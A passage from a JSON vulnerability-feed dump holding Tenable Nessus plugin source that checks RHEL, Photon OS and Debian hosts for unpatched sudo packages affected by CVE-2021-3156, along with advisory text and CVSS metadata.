'rhel-ha-for-rhel-7-server-e4s-debug-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-source-rpms',\n 'rhel-ha-for-rhel-7-server-eus-debug-rpms',\n 'rhel-ha-for-rhel-7-server-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-eus-rpms',\n 'rhel-ha-for-rhel-7-server-eus-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-eus-source-rpms',\n 'rhel-ha-for-rhel-7-server-eus-source-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-tus-debug-rpms',\n 'rhel-ha-for-rhel-7-server-tus-rpms',\n 'rhel-ha-for-rhel-7-server-tus-source-rpms',\n 'rhel-rs-for-rhel-7-server-eus-debug-rpms',\n 'rhel-rs-for-rhel-7-server-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-rs-for-rhel-7-server-eus-rpms',\n 'rhel-rs-for-rhel-7-server-eus-rpms__7_DOT_7__x86_64',\n 'rhel-rs-for-rhel-7-server-eus-source-rpms',\n 'rhel-rs-for-rhel-7-server-eus-source-rpms__7_DOT_7__x86_64'\n ],\n 'rhel_tus_7_7_server': [\n 'rhel-ha-for-rhel-7-server-tus-debug-rpms',\n 'rhel-ha-for-rhel-7-server-tus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-tus-rpms',\n 'rhel-ha-for-rhel-7-server-tus-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-tus-source-rpms',\n 'rhel-ha-for-rhel-7-server-tus-source-rpms__7_DOT_7__x86_64'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0222');\n}\n\npkgs = [\n {'reference':'sudo-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'s390', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T09:11:34", "description": "An update of the sudo package has been released.", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-29T00:00:00", "title": "Photon OS 1.0: Sudo PHSA-2021-1.0-0358", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-29T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:sudo", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0358_SUDO.NASL", "href": "https://www.tenable.com/plugins/nessus/145699", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0358. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145699);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n\n script_name(english:\"Photon OS 1.0: Sudo PHSA-2021-1.0-0358\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the sudo package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-358.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'sudo-1.9.5-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0227 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-28T00:00:00", "title": "RHEL 6 : sudo (RHSA-2021:0227)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-28T00:00:00", "cpe": ["cpe:/o:redhat:rhel_els:6", "p-cpe:/a:redhat:enterprise_linux:sudo-devel", "p-cpe:/a:redhat:enterprise_linux:sudo"], "id": "REDHAT-RHSA-2021-0227.NASL", "href": "https://www.tenable.com/plugins/nessus/145536", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0227. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145536);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0227\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 6 : sudo (RHSA-2021:0227)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0227 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0227\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_els_6': [\n 'rhel-6-for-system-z-els-debug-rpms',\n 'rhel-6-for-system-z-els-debug-rpms__s390x',\n 'rhel-6-for-system-z-els-optional-debug-rpms',\n 'rhel-6-for-system-z-els-optional-debug-rpms__s390x',\n 'rhel-6-for-system-z-els-optional-rpms',\n 'rhel-6-for-system-z-els-optional-rpms__s390x',\n 'rhel-6-for-system-z-els-optional-source-rpms',\n 'rhel-6-for-system-z-els-optional-source-rpms__s390x',\n 'rhel-6-for-system-z-els-rpms',\n 'rhel-6-for-system-z-els-rpms__s390x',\n 'rhel-6-for-system-z-els-source-rpms',\n 'rhel-6-for-system-z-els-source-rpms__s390x',\n 'rhel-6-server-els-debug-rpms',\n 'rhel-6-server-els-debug-rpms__i386',\n 'rhel-6-server-els-debug-rpms__x86_64',\n 'rhel-6-server-els-optional-debug-rpms',\n 'rhel-6-server-els-optional-debug-rpms__i386',\n 'rhel-6-server-els-optional-debug-rpms__x86_64',\n 'rhel-6-server-els-optional-rpms',\n 'rhel-6-server-els-optional-rpms__i386',\n 'rhel-6-server-els-optional-rpms__x86_64',\n 'rhel-6-server-els-optional-source-rpms',\n 'rhel-6-server-els-optional-source-rpms__i386',\n 'rhel-6-server-els-optional-source-rpms__x86_64',\n 'rhel-6-server-els-rpms',\n 'rhel-6-server-els-rpms__i386',\n 'rhel-6-server-els-rpms__x86_64',\n 'rhel-6-server-els-source-rpms',\n 'rhel-6-server-els-source-rpms__i386',\n 'rhel-6-server-els-source-rpms__x86_64'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0227');\n}\n\npkgs = [\n {'reference':'sudo-1.8.6p3-29.el6_10.4', 'cpu':'i686', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-1.8.6p3-29.el6_10.4', 'cpu':'s390x', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-1.8.6p3-29.el6_10.4', 'cpu':'x86_64', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'i686', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'s390', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'s390x', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'x86_64', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T09:48:39", "description": "The Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super\nuser privileges to specific users. Any local user (sudoers and\nnon-sudoers) can exploit this flaw for root privilege escalation.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.8.19p1-2.1+deb9u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/sudo\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "Debian DLA-2534-1 : sudo security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:sudo-ldap", "p-cpe:/a:debian:debian_linux:sudo", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2534.NASL", "href": "https://www.tenable.com/plugins/nessus/145475", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2534-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145475);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"Debian DLA-2534-1 : sudo security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super\nuser privileges to specific users. Any local user (sudoers and\nnon-sudoers) can exploit this flaw for root privilege escalation.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.8.19p1-2.1+deb9u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/sudo\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/sudo\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/sudo\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected sudo, and sudo-ldap packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sudo-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"sudo\", reference:\"1.8.19p1-2.1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"sudo-ldap\", reference:\"1.8.19p1-2.1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T09:11:35", "description": "An update of the sudo package has been released.", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-29T00:00:00", "title": "Photon OS 2.0: Sudo PHSA-2021-2.0-0315", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-29T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:sudo", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2021-2_0-0315_SUDO.NASL", "href": "https://www.tenable.com/plugins/nessus/145695", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0315. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145695);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n\n script_name(english:\"Photon OS 2.0: Sudo PHSA-2021-2.0-0315\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the sudo package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-315.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 